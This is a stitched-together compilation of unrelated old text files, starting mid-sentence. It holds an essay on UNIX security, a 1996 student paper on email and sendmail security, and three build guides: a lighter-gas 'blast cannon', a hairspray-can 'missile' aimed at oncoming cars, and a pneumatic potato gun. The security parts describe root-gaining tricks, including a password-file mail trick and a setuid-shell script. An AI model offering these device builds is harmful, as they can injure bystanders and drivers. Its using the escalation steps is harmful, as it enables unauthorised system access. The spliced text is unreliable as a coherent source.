files readable and writable by everyone.In the current version,this policy may

be easily adjusted to suit the needs ofthe installation or the individual user.



Associated with each process and its descendants is a mask, which is in effect

anded with the mode of every file and directory created by that process.  In

this way, users can arrange that, by default,all their files are no more

accessible than they wish.The standard mask, set by login,allows all permiss-

ions to the user himself and to his group,but disallows writing by others.



To maintain both data privacy and data integrity,it is necessary, and largely

sufficient,to make one's files inaccessible to others.  The lack of sufficiency

could follow from the existence of set-UID programs created by the user and the

possibility of total breach of system security in one of the ways discussed

below(or one of the ways not discussed below).



For greater protection,an encryption scheme is available.Since the editor is

able to create encrypted documents, and the crypt command can be used to pipe

such documents into the other text-processing programs,the length of time

during which clear text versions need be available is strictly limited.The

encryption scheme used is not one of the strongest known, but it is judged

adequate, in the sense that cryptanalysisis likely to require considerably more

effort than more direct methods of reading the encrypted files.For example, a

user who stores data that he regards as truly secret should be aware that he is

implicitly trusting the system administrator not to install a version of the

crypt command that stores every typed password in a file.  Needless to say, the

system administrators must be at least as careful as their most demanding user

to place the correct protection mode on the files under their control.



In particular,it is necessary that special files be protected from writing, and

probably reading, by ordinary users when they store sensitive files belonging

to otherusers.It is easy to write programs that examine and change files by

accessing the device on which the files live.



On the issue of password security,UNIX is probably better than most systems.

Passwords are stored in an encrypted form which, in the absence of serious

attention from specialists in the field,appears reasonably secure, provided its

limitations are understood.In the current version, it is based on a slightl y

defective version of the Federal DES;it is purposely defective so that

easily-available hardware is useless for attempts at exhaustive

key-search.Since both the encryption algorithm and the encrypted passwords are

available,exhaustive enumeration of potential passwords is still feasible up to

a point.We have observed that users choose passwords that are easy to

guess:they are short, or from a limited alphabet, or in a dictionary.

Passwords should be at least six characters long and randomly chosen from an

alphabet which includes digits and special characters.



Of course there also exist feasible non-cryptanalytic ways of finding out

passwords.For example:	write a program which types out ``login:''on the

typewriter and copies whatever is typed to a file of your own.	Then invoke the

command and go away until the victim arrives..The set-UID (set-GID)notion must

be used carefully if any security is to be maintained.	The first thing to keep

in mind is that a writable set-UID file can have another program copied onto

it.



For example, if the super-user command is writable,anyone can copy the shell

onto it and get a password-free version of Shell Unix.A more subtle problem can

come from set-UID programs which are not sufficiently careful of what is fed

into them.To take an obsolete example,the previous version of the mail command

was set-UID and owned by the super-user.This version sent mail to the r

ecipient's own directory.The notion was that one should be able to send mail to

anyone even if they want to protecttheir directories from writing.  The trouble

was that mailwas rather dumb:anyone could mail someone else's priva te file to

himself.Much more seriousis the following scenario:  make a file with a line

like one in the password filewhich allows one to log in as the super-user.Then

make a link named ``.mail'' to the password file in some writable directory on

the same device as the password file (say /tmp).  Finally mail the bogus login

line to /tmp/.mail;You can then login as the superuser,clean up the

incriminating evidence,and have your will.



The fact that users can mount their own disks and tapes as file systems can be

another way of gaining super-user status.Once a disk pack is mounted, the

system believes what is on it.Thus one can take a blank disk pack,put on it

anything desired,and mount it.There are obvious and unfortunate consequences.

For example:a mounted disk with garbage on it will crash the system;one of the

files on the mounted disk can easily be a password-free version of Shell Unix;

other files can be unprotected entries for special files.  The only easy fix

for this problem is to forbid the use of mount to unpriv- ileged users.A

partial solution, not so restrictive,would be to have the mount command examine

the special file for bad data,set-UID programs owned by others ,and accessible

special files,and balk at unprivileged invokers.





Scott Walters   London, CANADA
walterss@julian.uwo.ca  <CarbonBoy>
PGP 31 03 1B E1 C7 6E 3A EC  97 32 01 BA 5B 05 5D FB
finger me for public key block
MIME-mail welcome

'Beware the fury of a patient man.'

Home-brew blast cannon                          by The Jolly Roger  Materials needed:   -1 plastic drain pipe, 3 feet long, at least 3 1/2 inches in    diameter  -1 smaller plastic pipe, about 6 inches long, 2 inches in    diameter  -1 large lighter, with fluid refills (this gobbles it up!)  -1 pipe cap to fit the large pipe, 1 pipe cap to fit the small    pipe  -5 feet of bellwire  -1 SPST rocker switch  -16v polaroid pot-a-pulse battery  -15v relay (get this at Radio Shack)  -Electrical Tape  -One free afternoon  Procedure:   - Cut the bell wire into three equal pieces, and strip the ends   - Cut a hole in the side of the large pipe, the same diameter as  the small pipe. Thread the hole and one end of the small pipe.  they should screw together easily.   - Take a piece of scrap metal, and bend it into an "L" shape,  then attach it to the level on the lighter:   /------------------------gas switch is here  V  /------ !lighter!!<---metal lever !!! !!  Now, every time you pull the 'trigger' gas should flow freely from  the lighter. You may need to enlarge the 'gas port' on your  lighter, if you wish to be able to fire more rapidly.   - Connect two wires to the two posts on the switch   - Cut two holes in the side of the smaller tube, one for the  switch on the bottom, and one for the metal piece on the top.  Then, mount the switch in the bottom, running the wires up and out  of the top.   - Mount the lighter/trigger in the top. Now the switch should  rock easily, and the trigger should cause the lighter to pour out  gas. Re-screw the smaller tube into the larger one, hold down the  trigger a bit, let it go, and throw a match in there. If all goes  well, you should hear a nice big 'THUD!'   - Get a hold of the relay, and take off the top.  1--------------- v/  2--------------/<--- the center object is the metal finger inside                 3                                       the relay  cc-------------/  oo----------------4  ii  ll----------------5  Connect (1) to one of the wires coming from the switch. Connect  (2) to (4), and connect (5) to one side of the battery. Connect  the remaining wire from the switch to the other side of the  battery. Now you should be able to get the relay to make a little  'buzzing' sound when you flip the switch and you should see some  tiny little sparks.   - Now, carefully mount the relay on the inside of the large pipe,  towards the back. Screw on the smaller pipe, tape the battery to  the side of the cannon barrel (yes, but looks aren't everything!)   - You should now be able to let a little gas into the barrel and  set it off by flipping the switch.   - Put the cap on the back end of the large pipe VERY SECURELY.  You are now ready for the first trial-run!  To Test:  Put something very, very large into the barrel, just so that it  fits 'just right'. Now, find a strong guy (the recoil will  probably knock you on your ass if you aren't careful!). Put on a  shoulderpad, earmuffs, and possibly some other protective clothing  (trust the Jolly Roger! You are going to need it!). Hold the  trigger down for 30 seconds, hold on tight, and hit the switch.  With luck and the proper adjustments, you should be able to put a  frozed orange through 1/4 or plywood at 25 feet.  Have fun!                                  -Exodus-    _

                              Down the Road' Missle    This missle is aptly named because it travels best down a street or road. This  is nothing more that harmless phun intended to scare the living shit out of  oncoming cars.    How To Make A Missle --------------------  All you need are :  -Hairspray can, or something else with flammable propellant (don't use  spraypaint dipshit, it makes a big mess!)   -book of ordinary matches  -tape (clear if possible, its thinner)  -BB or pellet gun (use BB's if possible)   Instructions: -------------  Tape the book of matches to the bottom of the can, y'know, the CONCAVE part.  You might want to arrange the matches so that they are spread over a wide area  of the bottom of the can, but close together. 	Shake the can up vigorously. Now place the can on its side with the  nozzle of the can pointed in the direction you want it to go, down a road, off  a ramp, at your sister, etc.. Now stand back a bit, and shoot at the matches. It should take off at about 30 ft per sec!!  What happens in case you couldn't tell, is the BB hits the matches and causes a spark, and at roughly the same time, punctures the weak bottom of the can.  As the propellant sprays out, it hopefully comes in contact with the spark, and presto. If you dont do it right you'll blow a lot of money because each can can only be used once, so  experiment to find best results.   In The Air Missle -----------------  Compile the rocket as stated before, and put it verticle on a stand of some  sort with the bottom accessable.  Place a section of PVC pipe 95 deg.  preferred and shoot into the PVC pipe which should direct the BB upward, and  the can should take off.  Experiment w/ different cans, its hard to find ones that work perfectly, and still go higher than 30 ft.                                                                    ----------EXODUS         --------------------------------------------------------------------------------

--------------------------------------------------------------------------------

Internet Email, How it Works: Check Your Privacy and Security at the Door
By:
David Hesprich
CS230.10
April 30, 1996

--------------------------------------------------------------------------------

Abstract



Most e-mail isn't truly private. It can be intercepted en route; read by any person with root privileges or your account privileges; read from the mailqueue on outgoing, intermediate, or in going systems; redistributed by the recipient; or simply accidently sent to the wrong person by a malformed address. Consequently, e-mail should never be considered a secure medium. Users should make themselves aware of the mail system. System administrators should be aware that most security problems with sendmail are related to the complexity and flexibility of the configuration file. Although it can be possible to use electronic mail as a secure means of communication. Digital signatures and strong encryption can help authenticate the source of messages and protect content. However, the Internet mail system has no provisions for tight integration with such enhancements and they are often awkward and difficult to use. Point to point IP encryption can protect system passwords and communications between hosts. But this type of encryption only works between the encryption gateways. Until security packages become more reliable, cheaper, and accessible to the end user, it is doubtful they will see widespread use.


--------------------------------------------------------------------------------

Index:
SMTP 
Mail headers 
sendmail 
Security 
Probes 
The sendmail Configuration File 
File Permissions 
Packet Sniffing 
Forged Mail 
Mailbombing 
Intellectual Property 
Appendix: Information Resources 
CERT Advisories 
Request for Comments 
Other Information Resources 
Other Security References 
Bibliography 

--------------------------------------------------------------------------------

The Simple Mail Transport Protocol (SMTP)
(Adapted from RFC 821)
There are three steps to SMTP mail transactions. The transaction is started with a MAIL command which gives the sender identification. A series of one or more RCPT commands follows giving the receiver information. Then a DATA command gives the mail data. And finally, the end of mail data indicator confirms the transaction.

The first step in the procedure is the MAIL command. The <reverse-path> contains the source mailbox.

MAIL FROM:<reverse-path><CRLF>
This command tells the SMTP-receiver that a new mail transaction is starting and to reset all its state tables and buffers, including any recipients or mail data. It gives the reverse-path which can be used to report errors. If accepted, the receiver-SMTP returns a 250 OK reply.

The <reverse-path> can contain more than just a mailbox. The <reverse-path> is a reverse source routing list of hosts and source mailbox. The first host in the <reverse-path> should be the host sending this command.

The second step in the procedure is the RCPT command.

RCPT TO:<forward-path><CRLF>
This command gives a forward-path identifying one recipient. If accepted, the receiver-SMTP returns a 250 OK reply, and stores the forward-path. If the recipient is unknown the receiver-SMTP returns a 550 Failure reply. This second step of the procedure can be repeated any number of times.

The <forward-path> can contain more than just a mailbox. The <forward-path> is a source routing list of hosts and the destination mailbox. The first host in the <forward-path> should be the host receiving this command.

The third step in the procedure is the DATA command.

DATA<CRLF>
If accepted, the receiver-SMTP returns a 354 Intermediate reply and considers all succeeding lines to be the message text. When the end of text is received and stored the SMTP-receiver sends a 250 OK reply. Since the mail data is sent on the transmission channel the end of the mail data must be indicated so that the command and reply dialog can be resumed. SMTP indicates the end of the mail data by sending a line containing only a period. A transparency procedure is used to prevent this from interfering with the user's text.

Please note that the mail data includes the memo header items such as Date:, Subject:, To:, Cc:, and From:.

The end of mail data indicator also confirms the mail transaction and tells the receiver-SMTP to now process the stored recipients and mail data. If accepted, the receiver-SMTP returns a 250 OK reply. The DATA command should fail only if the mail transaction was incomplete (for example, no recipients), or if resources are not available.

Example of the SMTP Procedure
This SMTP example shows mail sent by John.Doe at host Alpha.ARPA, to Jones, Smith, Lee, Green, and Brown at host Beta.ARPA. Here we assume that host Alpha contacts host Beta directly.




220 Alpha.ARPA Simple Mail Transfer Service Ready
HELO Beta.ARPA
250 Alpha.ARPA
MAIL FROM:<John.Doe@Alpha.ARPA>
250 OK
RCPT TO:<Jones@Beta.ARPA>
250 OK
RCPT TO:<Smith@Gamma.ARPA>
251 User not local; will forward to <Smith@Gamma.ARPA>
RCPT TO:<Lee@Beta.ARPA>
551 User not local; please try <Robert.E.Lee@Delta.ARPA>
RCPT TO:<Green@Beta.ARPA>
550 No such user here
RCPT TO:<Brown@Beta.ARPA>
250 OK
DATA
354 Start mail input; end with <CRLF>.<CRLF>
Message headers and body...
<CRLF>.<CRLF>
250 OK
QUIT
221 Beta.ARPA Service closing transmission channel 




The mail has now been accepted for Jones and Brown.

In the case of Smith, the 251 User not local reply indicates that the receiver-SMTP knows the user's mailbox is on another host and indicates the correct forward-path to use in the future. Note that either the host or user or both may be different. The receiver (in this case Beta) takes responsibility for delivering the message.

For Lee, the 551 User not local indicates that the receiver-SMTP knows the user's mailbox is on another host and indicates the correct forward-path to use. Again, note that either the host or user or both may be different. The receiver (Beta) refuses to accept mail for this user, and the sender (Alpha) must either redirect the mail according to the information provided or return an error response to the originating user.

Green did not have a mailbox at host Beta.

RFC 821 has more information on the Simple Mail Transfer Protocol, as well as the SMTP commands.





Mail Headers
Every mail message is composed of two parts: a header and a body. The header is composed of all lines from the first until a blank line. The body consists of all lines after the first blank line. The first blank line acts as a separator and belongs to neither the header nor the footer. Although there are many header lines that can appear in a mail message, some are required, some are optional, and some lines may appear more than once.

From: not required for some programs (like mh), it is only required by some programs (like /bin/mail), it is added by the program that performed the actual delivery. 
Delivery-Date: is the date and time the message was delivered into the recipient's system mailbox. This line is usually added by the program that performs final delivery (usually /bin/mail). 
Return-Path: contains the address the recipient can use to reply to the sender. It should only be added by the system that performs final delivery (sendmail). 
Received: this line is added for every machine that handled the message moving it from the sender to the recipient. Each line represents a hop. If a message goes through too many hops, the message will bounce (fail) and be returned to the sender as a failed message. Note that this actually two lines, the indented line following it is a continuation of the preceding Received: line. 
Date: the date and time the message was originally sent. 
From: the email address and full name of the sender. The order of the two may be reversed and still be syntactically correct. 
Message-Id: a unique identification string constructed from the date, time, a unique filename, and the originating machine. 
To: a list of one or more recipients, separated by commas. 
The header used by sendmail is defined by RFC822, with some additional explanation found in RFC1123. Several other RFCs define additional headers.





sendmail
Sendmail is a mail transport agent (MTA). Like other MTA's such as MMDF, Smail, and Zmailer, sendmail is a program which handles the delivery of mail for many users and the forwarding of email between machines or networks. Consequently, sendmail needs to be able to route mail between various types of networks (local, UUCP, Internet, BITNET), which sendmail does through the use of a very flexible (and complicated) configuration file and supporting programs, files, tables, and services.





Security
The sendmail program can be a potential doorway to system abuse since sendmail is typically configured to run as an setuid root process. This means that sendmail has all the powers and privileges of the root user. Incorrect file permissions can be used to trick sendmail into giving root privilege away. For instance, forcing sendmail to run the following shell script will create a setuid shell:

#!/bin/sh







cp /bin/sh /tmp/.shell







chmod u+s /tmp/.shell
Since sendmail runs most of the time as root, any user which runs /tmp/.shell will then have root access privileges. The Morris Worm used a flaw in old versions of sendmail to gain access to thousands of machines.




Probes 
One method of attack upon a system is to probe it in order to either force it to give up information about itself which may make it more susceptible to attack, or to look for security loopholes or system software bugs.

SMTP debug and showq
A probe attempting to exploit an unfixed bug can use the SMTP debug and showq commands. The debug command allows the local sendmail to be placed in debugging mode (as the -d command-line switch) from any other machine attached to the network. The showq allows other machines to request a list of the contents of the mail queue (like the command mailq on the local machine).

If during compilation of sendmail the SMTPDEBUG macro is defined, the SMTP commands debug and showq are enabled. SMTPDEBUG should never be defined in a official release of sendmail. This can be checked in the following manner:




# telnet somehost.domain.com 25
Trying 198.76.10.2 ...
Connected to somehost.domain.com.
Escape character is '^]'.
220 somehost.domain.com ESMTP Sendmail 8.7.4/8.6.12 ready at Wed, 20 Mar 1996 13:42:43 -0500 (EST)
debug
500 Command unrecognized
quit
221 somehost.domain.com closing connection
Connection closed by foreign host. 




While connected to port 25 of the host, enter the command debug; if you are answered with 500 Command unrecognized, SMTPDEBUG is not defined. If the answer is 200 Debug set, SMTPDEBUG is set. When SMTPDEBUG is undefined, and a nonlocal user attempts the debug or showq commands, the IDA and V8 versions of Sendmail may issue a syslog(3) message:

Mar 20 13:42:52 localhost sendmail[28650]: "debug" command from user@farhost [xxx.xxx.xxx.xxx] (yyy.yyy.yyy.yyy)
SMTP vrfy and expn
The SMTP vrfy and expn cause sendmail to verify that a given address is valid. If a login name is given, then the full and login name are reported back. This is a security risk where users choose passwords which are a copy of their login names, or some variation of their name. With well-defined passwords (which can oftentimes be enforced by the system), full and login names can be safely given to the world at large.

Some versions of sendmail monitor the SMTP vrfy command: V8 and IDA may individually log requests, while the SunOS version sends mail to postmaster indicated failed attempts. Pre-V8 versions of sendmail do not report vrfy attempts at all. V8 sendmail allows vrfy and expn services to selectively accepted or rejected.




The sendmail Configuration File
When sendmail reads its configuration file, it usually does so as root, and can consequently read or write to any file.

F - Define Classes, File Form (Fc/path pattern)
Using the F command to read a file which is not world-readable can allow otherwise protected information to be released. Even if the scanf(3) option is correct, a core dump or frozen configuration file can still allow sensitive information to be examined.

F - Define Classes, Program Form (Fc| /path)
The program form of the F (file) configuration command runs a program, specified by path, to fill the class c with new values and can be modified to run a program which gives away root access privileges.

The sendmail configuration file should never be writable by anyone other than root, in a directory owned and writable only by root. Every path component of the directory should also be owned and writable by root as well.

M - Define Delivery Agent
The pathname of a mailer (P= equate) for a delivery agent can be modified to run a program which gives away root access privileges. The S flag (do not reset the userid before calling the mailer) in the F= equate causes sendmail to retain its root privilege when executing the P= equate, and is especially dangerous.

P= equates must be protected by protecting the configuration file. Relative pathnames should never be used in the P= equate.

Delivery Agent Statistics (OSfile)
Sendmail checks for the existence and writability of the file specified in the S configuration file. If the file specified is in a world-writable directory, sendmail will overwrite that file, or any file pointed to by a link of that name. This can cause critical system files to be destroyed.

Any file sendmail writes to must be writable only by root, and exist in a directory, every path component of which is owned, and writable, only by root.




File Permissions
All directories in the path of a root-owned file must be owned by root and writable only by root. This is true for all files, not just those pertaining to sendmail. Group writability should be avoided.

:include: Permissions
When delivering to a :include: mailing list sendmail changes its UID to that of a non-privileged user. Access to the UID owning the list can be gained if recipients list can be modified by any other user than the list owner.

Mailing lists (:include:) must be writable only by root, and exist in a directory, every path component of which is owned, and writable, only by root. The lists themselves must be writable only by the owner. If the owner is an ordinary user, group writability may be enables, providing the user is notified of the risks.

Mailing lists (:include:) may be safely owned by root. Sendmail processes a root-owned mailing list by changing itself to run as the user and group specified by the u and g options (which should be set to nobody and nogroup, rather than the daemon defaults.




~/.forward Permissions
User ~/.forward files must be writable only by the owning user. User home directories should live in a directory , and owned and writable only by the user.




Aliases File
The aliases file can be used to gain privileged access if improperly administered. Aliases that execute a program (like the decode alias most systems ship with), can be used to create SUID files or programs.




Packet Sniffing
Network monitoring attacks are becoming quite common. An intruder compromises a system and attains root-level access. While running a network monitoring tool, the intruder captures the first few keystrokes of all newly opened FTP, telnet, and rlogin sessions visible within the compromised system's domain. Typically the first group of keystrokes contain host, account, and password information for user accounts on other systems - all sent in the clear (unencrypted). Intruders usually install Trojan horse programs to support subsequent access to the compromised system and to conceal their network monitoring process(es).

The CERT Coordination Center publishes information on known Sendmail vulnerabilities and workarounds, as well as warnings about ongoing attacks.





Forged Mail
Like paper mail, electronic mail can be forged.

Mail Queue
All versions of sendmail implicitly trust the mail queue, as it is assumed that only sendmail has created the contents. Using the queue directory, it is possible to created forged messages that appear completely authentic.

The queue directory must be owned and writable only by root. CERT recommends that the mail queue directory be set mode 700. Queue files should be protected, a file mode of 0600 is recommended.

SMTP Forgeries
Sendmail, of necessity must allow connections at port 25, and with the exception of the hostname sent in the HELO message, will believe everything it is told. In the case of the sending host, sendmail looks up the real hostname based on the connection (V8 sendmail will also attempt to use identd), if they differ, the real hostname is used as the sending hostname in the construction of the Received: and Message-Id: headers.





Mailbombing
Well there's egg and bacon; egg, sausage and bacon; egg and spam; bacon and spam; egg, bacon, sausage and spam; spam, bacon, sausage and spam; spam, egg, spam, spam, bacon and spam; spam, spam, spam, egg and spam; spam, spam, spam, spam, spam, spam, baked beans, spam, spam, spam and spam; or lobster thermidor aux crevettes with a mornay sauce garnished with truffle pate', brandy and a fried egg on top of spam. -- Monty Python's Flying Circus

Mailbombing is the deliberate, unsolicited sending of large volume and/or length email to another user. It is typically a form of revenge for some real or imagined injury (deserved or otherwise) done by the victim.

There are also indirect forms of mailbombing, where the mailbomber hijacks the identity or e-mail address of the victim (or claims to be a friend, relative, or coworker, etc.), and says something in a public forum that is guaranteed to draw a flood of responses, or subscribes to multiple high-traffic mailing lists, or performs some other action with the intent of generating large volumes of e-mail directed at the victim.

All forms of mailbombing result in the great inconvenience of the user(s) involved. Mailboxes can fill up, preventing mail from being delivered; mail spools can overflow on the affected system, causing all mail delivery on that system to halt, and may result in the system finally crashing.

There is unfortunately, little or no way to prevent mailbombing. It takes no talent or special knowledge, and raw materials for mailbombs are always at hand (a favorite method of mailbomber to fill mailboxes is to send multiple copies of core dumps). The mail sever can be offered some protection by giving the mail queue a separate filesystem space. This protects the rest of the system in that it keeps the mail queue from filling critical disk space needed by other running system processes.





Intellectual Property
As computer networks become more common in day-to-day life, lawyers will try to adapt existing laws to fit the digital world. Currently, some nations are attempting to change the law to adapt to the new technology. This is of interest to the Internet user in that new legislation may restrict current freedoms. The user must understand the law in order to develop new technologies that protect the current environment for change.

The truth of the matter is that there is no perfect answer to the questions of ownership or liability. When digital information crosses states lines, is it interstate commerce? Chances are it may very well be. Which "community standards" apply on the Internet, which topologically reduces geography to a single point? What control do you have over your e-mail after it has been sent, is it truly private?

E-mail may exist only as digital information held in a computer's temporary storage, which calls into question the "fixed in any tangible medium of expression" requirement of copyright. On the other hand, e-mail is very much like a written letter, which is protected by copyright. Like written letters, people often use e-mail to communicate, and have an interest in having their ideas protected. Unfortunately, e-mail's status under copyright remains uncertain.

Under the Electronic Communications Privacy Act of 1986, the owner of the system, rather than the author or recipient of the e-mail, is the owner of the the message. This holds regardless of the nature of the message. An extension of that logic has been held forth in some company's policies which maintain that e-mail sent using accounts paid for by the company, but not on systems owned by the company, are similarly owned by the company.





Conclusion
Most e-mail isn't truly private. It can be intercepted en route; read by any person with root privileges or your account privileges; read from the mailqueue on outgoing, intermediate, or in going systems; redistributed by the recipient; or simply accidently sent to the wrong person by a malformed address. Consequently, e-mail should never be considered a secure medium. Many times the mail queues and user directories are backed up as part of system maintenance, so mail that a user has deleted may actually exist on backup storage that may be retained for years.

Users should take the following precautions when using e-mail:

Make certain to use care when composing mail, especially the recipient and carbon copy header lines. 
Write your message as if it was to be distributed as a widely-read newspaper. 
Remember that your password give both access to your e-mail and your identity, as well as your account's files. 
Do not undermine the secrecy of your password by using your name, birthday, address, telephone number or extension, Social Security Number, or anything else that exists in public or official records. 
Do not place your password in a publicly accessible area, on or around the computer, under the mouse pad, etc. 
Be aware of your system's privacy and security policies. 
System administrators should be aware that most security problems with sendmail are related to the complexity and flexibility of the configuration file.

Use extreme care when configuring sendmail. Do not use a configuration file that you have not examined. 
Avoid allowing aliases to run external programs. 
Develop a policy for handling new security holes, user abuses, and external attacks. 
Develop a contingency plan should mail services fail. 
In conclusion, it should be noted that it can be possible to use electronic mail as a secure means of communication. Digital signatures and strong encryption (like those provided by the popular Pretty Good Privacy software) can help authenticate the source of messages and protect content. However, the Internet mail system has no provisions for tight integration with such enhancements and they are often awkward and difficult to use. Point to point IP encryption can protect system passwords and communications between hosts. But this type of encryption only works between the encryption gateways. Until security packages become more reliable, cheaper, and accessible to the end user, it is doubtful they will see widespread use.


--------------------------------------------------------------------------------

Appendix: Information Resources
CERT Advisories
(Adapted from the CERT FAQ)
The CERT Coordination Center is the organization that grew from the computer emergency response team formed by the Defense Advanced Research Projects Agency (DARPA) in November 1988 in response to the needs identified during the Internet worm incident. The CERT charter is to work with the Internet community to facilitate its response to computer security events involving Internet hosts, to take proactive steps to raise the community's awareness of computer security issues, and to conduct research targeted at improving the security of existing systems.

CERT products and services include 24-hour technical assistance for responding to computer security incidents, product vulnerability assistance, technical documents, and seminars. In addition, the team maintains a number of mailing lists (including one for CERT advisories) and provides a web site, www.cert.org, and an anonymous FTP server, info.cert.org, where security-related documents, CERT advisories, and tools are available.

A CERT advisory is a document that provides information on how to obtain a patch or details of a workaround for a known computer security problem. The CERT Coordination Center works with vendors to produce a workaround or a patch for a problem, and does not publish vulnerability information until a workaround or a patch is available. A CERT advisory may also be a warning about ongoing attacks.

Network Monitoring
ftp://info.cert.org/pub/cert_advisories/CA-95:01.network.monitoring.attacks
ftp://info.cert.org/pub/cert_advisories/CA-95:01.README

Sendmail
ftp://info.cert.org/pub/cert_advisories/CA-93:16.sendmail.vulnerability
ftp://info.cert.org/pub/cert_advisories/CA-93:16a.sendmail.vulnerability.supplement ftp://info.cert.org/pub/cert_advisories/CA-93:16a.README
ftp://info.cert.org/pub/cert_advisories/CA-95:05.sendmail.vulnerabilities
ftp://info.cert.org/pub/cert_advisories/CA-95:05.README
ftp://info.cert.org/pub/cert_advisories/CA-95:08.sendmail.v.5.vulnerabilities
ftp://info.cert.org/pub/cert_advisories/CA-95:08.README
ftp://info.cert.org/pub/cert_advisories/CA-95:11.sun.sendmail-oR.vul
ftp://info.cert.org/pub/cert_advisories/CA-95:11.README
ftp://info.cert.org/pub/cert_advisories/CA-95:13.syslog.vul
ftp://info.cert.org/pub/cert_advisories/CA-95:13.README




Request For Comments (RFC)
SMTP
821 J. Postel, "Simple Mail Transfer Protocol", 08/01/1982. (Pages=58) (Format=.txt) (Obsoletes RFC0788) (STD 10)

Message Headers
0822 D. Crocker, "Standard for the format of ARPA Internet text messages", 08/13/1982. (Pages=47) (Format=.txt) (Obsoletes RFC0733) (STD 11) (Updated by RFC1327, RFC0987)

0987 S. Kille, "Mapping between X.400 and RFC 822", 06/01/1986. (Pages=69) (Format=.txt) (Updates RFC0822) (Obsoleted by RFC1148) (Updated by RFC1026)

1026 S. Kille, "Addendum to RFC 987: Mapping between X.400 and RFC-822", 09/01/1987. (Pages=4) (Format=.txt) (Updates RFC0987) (Updated by RFC1138)

1123 R. Braden, "Requirements for Internet hosts - application and support", 10/01/1989. (Pages=98) (Format=.txt) (STD 3)

1138 S. Kille, "Mapping between X.400(1988) / ISO 10021 and RFC 822", 12/01/1989. (Pages=92) (Format=.txt) (Updates RFC1026)

1148 B. Kantor, S. Kille, P. Lapsley, "Mapping between X.400 (1988) / ISO 10021 and RFC 822", 03/01/1990. (Pages=94) (Format=.txt) (Obsoletes RFC0987) (Obsoleted by RFC1327)

1327 S. Hardcastle-Kille, "Mapping between X.400(1988) / ISO 10021 and RFC822", 05/18/1992. (Pages=113) (Format=.txt) (Updates RFC0822) (Obsoletes RFC1148) (Updated by RFC1495)

1495 H. Alvestrand, S. Kille, R. Miles, M. Rose, S. Thompson, "Mapping between X.400 and RFC-822 Message Bodies", 08/26/1993. (Pages=15) (Format=.txt) (Updates RFC1327)




Other Information Resources
The CancelMoose Home Page. <http://www.cm.org/>.

The SPAM FAQ. <http://ddi.digital.net/~gandalf/spamfaq.html>.

Reagoso, Christopher D. "Internet Abuse Series: Surviving Abusive Repetitive Email Messages on the Internet (a.k.a. Spam Mail and Mail Bombs)." <http://www.apci.net/~reagosoc/IAB_MailBombs.htm>.




Other Security Resources
The SATAN (Security Analysis Tool for Auditing Networks) Homepage. <http://stud1.tuwien.ac.at/~e9125110/satan.html>.

The CERT Coordination Center. <http://www.cert.org/>.

MIT PGP Distribution Site. <http://web.mit.edu/network/pgp.html>.


--------------------------------------------------------------------------------

Bibliography



Allman, Eric. sendmail Installation and Operation Guide, Version 8.36. Berkeley, CA: University of California, 1995.

Costales, Bryan. sendmail. Sebastopol, CA: O'Reilly & Associates, Inc., 1994.

Miller, Steven E. Civilizing Cyberspace: Policy, Power, and the Information Superhighway. New York, NY: ACM Press, 1996.





--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

 
PNEUMATIC SPUD SHOOTER

--------------------------------------------------------------------------------

PURPOSE
Ever seen those silly little hairspray powered spud guns that are all the rage? How'd you like to show up those guys with a cannon capable of launching spuds nearly 5 times farther? Read on... 
Testing of hairspray spud guns revealed they can develop no more than 10-20 PSI chamber pressure. Most are built from schedule 40 PVC pipe. 3" PVC pipe has a burst pressure of 260 PSI. People have suggested using other fuels to boost pressures higher, however this is much to dangerous. More volatile fuels can be very unpredictable and create pressures that would shatter the PVC pipe. Compressed air can be regulated to exact safe pressures making it an excellent propellant. The trick is releasing a large volume of air at once to launch the projectile. Here's how it's done...

DRAWINGS
You may need a drawing to fully understand the concepts of operation and assembly. 
PARTS
All pipe and fittings are schedule 40 PVC 1 1/2" pipe 72" long 3" pipe 36" long 1 1/2" to 3" bell reducer 3" female adapter 3" cleanout plug diaphragm (see below) a couple old trouser legs source of compressed air blow gun with tapered nozzle 
ASSEMBLY
Cut the pipes to length. The barrel pipe must have a perfectly square and smooth surface on the breach end. You may have to flat file and sand it to make sure a good seal with the diaphragm is achieved. 

Cut a 3 3/16 diameter disk of 3/32 thick polypropylene or polyethylene. A cheap dishpan from Kmart may be a good source of diaphragm material. 

The front bell reducer has a small ridge that would prevent barrel from being pushed through it during assembly. Use a half round file to remove the ridge. Make sure you can push the barrel though the reducer. Remove the barrel and set it aside. 

Drill a hole through the center of the cleanout plug. Size this hole to achieve a tight fit with the tapered nozzle of the blow gun. 

Assemble the outer chamber first. Glue the bell reducer and the female adapter to each end of the 3" pipe. allow the glue to dry before proceeding to install the barrel. 

Place the diaphragm in the female adapter and screw the cleanout plug in firmly. Push the barrel through the reducer until it sets firmly against the diaphragm. Pull it back out 3 inches to allow glue to be applied. Apply glue to the barrel in front of the reducer and push it quickly back into position against the diaphragm. Hold the barrel in place until the glue dries. 

After the gun is assembled, remove the cleanout plug and check to see if the barrel is properly centered in the female adapter at the breach. If it is not, cut 3 or 4 pieces of 5/8" heater hose about 1" long and force them between the barrel and the outer chamber. 

Slip the old trouser legs over the chamber area of the cannon and tape them in place. This simple precaution will contain any pieces of exploding pipe from becoming shrapnel if something should go wrong. 


FIRING
To fire the cannon, unscrew the cleanout plug and remove the diaphragm. Push a pre-cut spud into the breach of the barrel, making sure it is an inch or two below flush. Replace the diaphragm and screw the cleanout plug in firmly. Point the cannon down range. Place the blowgun in the charging hole drilled centered in the cleanout plug. Start squirting air into the cannon with the blowgun. When the sound of hissing air quiets down or stops, the cannon is charged and ready to fire. Keep the blowgun valve pressed down. Aim carefully and pull the blowgun from the charging hole. 
TIPS
A tapered nozzle on the blowgun is a must. Size the hole in the cleanout plug to fit the nozzle snugly. Sharpen a short piece of 1 1/2 pipe on the outside to precut your potato. Portability can be had with a 5 or 10 Lb. bottle of CO2 and a regulator. feel free to experiment with different barrel and chamber lengths. This plan was only a starting point. Get a couple of friends to help spot your shots. The spud leaves the barrel *REAL* fast and can be hard to see. I've got one shot to go 755 yards! 


THEORY
Because the diaphragm is somewhat flexible it will bend it's outer edges forward from the pressure and allow the air to fill the outer chamber. At the same time this forward pressure is sealing off the end of the barrel preventing air from escaping up the barrel. Pulling the blowgun out of the charging hole allows the air behind the diaphragm to escape to the atmosphere. At this point all the pressure stored in the outer chamber bends the diaphragm in the opposite direction sealing off on the outer edge of the cleanout plug. The diaphragm continues to bend under the pressure and unseals the barrel end allowing the stored air to escape up the barrel behind the spud. This in turn, propels the potato distances before unknown to mortal spud marksmen. 

